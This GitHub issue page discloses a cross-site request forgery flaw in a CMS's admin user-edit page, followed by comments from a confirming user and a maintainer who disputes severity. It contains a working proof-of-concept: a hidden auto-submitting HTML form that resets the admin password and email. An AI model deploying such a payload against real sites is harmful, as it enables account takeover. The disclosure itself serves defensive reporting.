Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CSRF on admin/user/edit page lead to full account take over #153

Closed
chhaipov opened this issue Jul 11, 2018 · 3 comments
Closed

CSRF on admin/user/edit page lead to full account take over #153

chhaipov opened this issue Jul 11, 2018 · 3 comments

Comments

@chhaipov
Copy link

Hello,

I came across and tried to find bug on this CMS. I see that user edit page is vulnerable to CSRF attack because there is no CSRF token to validate user's request. it means that if an admin user visits crafted url made by attacker (via XSS or Phishing), a POST request will be generated and be submitted to wity/admin/user/edit/1 that will change admin user information included password and email address.

once exploited, attacker can fully take over admin's account.

Affect url: http://192.168.56.200/wity/admin/user/edit/1

Steps to reproduce:

  1. Check POST request when user edit information on /wity/admin/user/edit/1
    image

  2. Build CSRF POC based on POST request from user/edit and store it in attacker’s site

    <iframe id="test" name="test" style="display:none"> 

    </iframe> 

    <form action="http://192.168.56.200/wity/admin/user/edit/1" method="post" id="the_form" style="display:none" target="test">    

        <input type="hidden" name="id" value="1"  /> 

        <input type="hidden" name="nickname" value="admin"  /> 

        <input type="hidden" name="password" value="csrf123"  /> 

        <input type="hidden" name="password_conf" value="csrf123"  /> 

        <input type="hidden" name="email" value="csrf@test.com"  /> 

        <input type="hidden" name="groupe" value="0"  /> 

        <input type="hidden" name="type" value="all"  />     

        <input type="submit" value="Change Password"  /> 

    </form> 

    <script type="text/javascript"> 

    //<![CDATA[ 

        var $form = document.getElementById ('the_form'); 

        $form.submit (); 

    //]]> 

    </script> 

</div> 
  1. Let user access CSRF POC in attacker’s site and then POST request will be generated and requested to http://192.168.56.200/wity/admin/user/edit/1
    Visiting attacker site:
    image
    POST request generated:
    image

  2. After that, user’s information will be changed to value attacker put on CSRF POC

Mitigation:

Original password is needed in order to change new password of user
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet

@nathunandwani
Copy link

I can confirm the findings of @chhaipov. Just tested in my admin's account through Kali Linux. Best to implement a CSRF token to solve this.

@chhaipov
Copy link
Author

@nathunandwani thanks for your clarification. I hope developer will fix this issue soon

@JohanDufau
Copy link
Member

Hello,
You cannot submit a POST request if your referer is different from thee current website instance.

Moreover:

  • About phishing: admin user of this CMS are advanced user so they should not get caught by phishing
  • About XSS: another issue is dealing about this so it will be solved in those issues.

Anyway, thanks for your feedback. Don't hesitate to do a PR if you want to share an improvement on the admin logic.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants